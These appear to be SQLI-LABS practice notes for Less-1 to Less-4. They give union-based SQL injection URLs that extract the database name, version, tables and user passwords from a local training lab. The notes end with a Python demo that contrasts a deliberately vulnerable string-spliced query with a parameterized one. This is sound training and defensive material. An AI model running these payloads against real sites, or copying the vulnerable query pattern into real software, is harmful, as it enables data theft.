SQLI-LABS Practice Notes

Basic Challenge

Less-1

Find the injection point:

http://127.0.0.1/sqli-lab/Less-1/?id=1

Appending ' reveals the injection point; the error shows the value is already wrapped in single quotes:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

Next, just comment out the rest of the statement. Either # or --+ works as the comment.

Guess the number of columns:

http://127.0.0.1/sqli-lab/Less-1/?id=1' order by 3--+

4 gives an error and 3 does not, so the column count is 3.

Query the database:

http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,3--+

The display positions are 2 and 3.

http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,database(),version()--+

http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,group_concat(database(),version())--+

The database is security; the database version is 5.5.53.

Query tables:

http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

Tables: emails, referers, uagents, users.

Query columns:

http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

Columns: id, username, password.

Query contents:

http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,password from users--+

password: Dumb.

Less-2

Find the injection point:

http://127.0.0.1/sqli-lab/Less-2/?id=1'

An error appears, but the single quote we added did not close the statement. The original statement is already closed, and adding ' just leaves one extra ':

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

So simply remove the ' from the Less-1 payloads.

payload:

http://127.0.0.1/sqli-lab/Less-2/?id=1--+

The remaining steps are the same as Less-1.

Less-3

Find the injection point:

http://127.0.0.1/sqli-lab/Less-3/?id=1'

The error message shows there is also a parenthesis, so the statement must be closed with a quote plus a parenthesis:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

payload:

http://127.0.0.1/sqli-lab/Less-3/?id=1')--+

The remaining steps are the same as Less-1.

Less-4

Find the injection point:

http://127.0.0.1/sqli-lab/Less-4/?id=1'

Adding a single quote produces no error.

http://127.0.0.1/sqli-lab/Less-4/?id=1"

Adding a double quote produces an error, and the message shows the statement must be closed with a double quote plus a parenthesis:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

payload:

http://127.0.0.1/sqli-lab/Less-4/?id=1")--+

The remaining steps are the same as Less-1.
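The reason each lesson needs a different closing sequence is how the PHP code splices the id value into the query text. The following is an added example, not code from sqli-labs: it reproduces the Less-1/2/3 splicing patterns against a constructed SQLite stand-in for the users table, shows that the write-up's union payloads return attacker-chosen rows and that the probe error leaks the closing characters, and then shows the parameterized form that is immune to them. The table contents, function names and the omission of Less-4 (SQLite treats double-quoted strings as identifiers) are assumptions of this example.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the lab's security.users table (sample rows only)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "Dumb", "Dumb"), (2, "alice", "s3cret")])  # constructed data
    return con

# How Less-1/2/3 splice the id value into the SQL text; the surrounding characters
# are exactly what the write-up had to close before the -- comment.
TEMPLATES = {
    "Less-1": "SELECT * FROM users WHERE id='{id}' LIMIT 0,1",
    "Less-2": "SELECT * FROM users WHERE id={id} LIMIT 0,1",
    "Less-3": "SELECT * FROM users WHERE id=('{id}') LIMIT 0,1",
}

def vulnerable_lookup(con, lesson, user_id):
    """Vulnerable pattern: the request value becomes part of the SQL statement."""
    sql = TEMPLATES[lesson].format(id=user_id)
    try:
        return con.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # The lab echoes the raw DB error to the page; that text is what revealed
        # the closing characters in the write-up. Never return this to a client.
        return f"error: {exc}"

def safe_lookup(con, user_id):
    """Hardened form: the value is bound as a parameter and is never parsed as SQL."""
    return con.execute("SELECT * FROM users WHERE id=? LIMIT 1", (user_id,)).fetchall()

# The write-up's union payloads, with the URL-encoded '--+' already decoded to '-- '.
UNION_PAYLOADS = {
    "Less-1": "-1' union select 1,2,3-- ",
    "Less-2": "-1 union select 1,2,3-- ",
    "Less-3": "-1') union select 1,2,3-- ",
}

def demo():
    con = make_db()
    results = {l: vulnerable_lookup(con, l, p) for l, p in UNION_PAYLOADS.items()}
    results["probe"] = vulnerable_lookup(con, "Less-1", "1'")      # the 1' test
    results["parameterized"] = safe_lookup(con, UNION_PAYLOADS["Less-1"])
    results["normal"] = safe_lookup(con, "1")
    return results

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Each vulnerable lookup returns the injected (1, 2, 3) row instead of a user, while the parameterized lookup compares the whole payload as one literal value and returns nothing.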
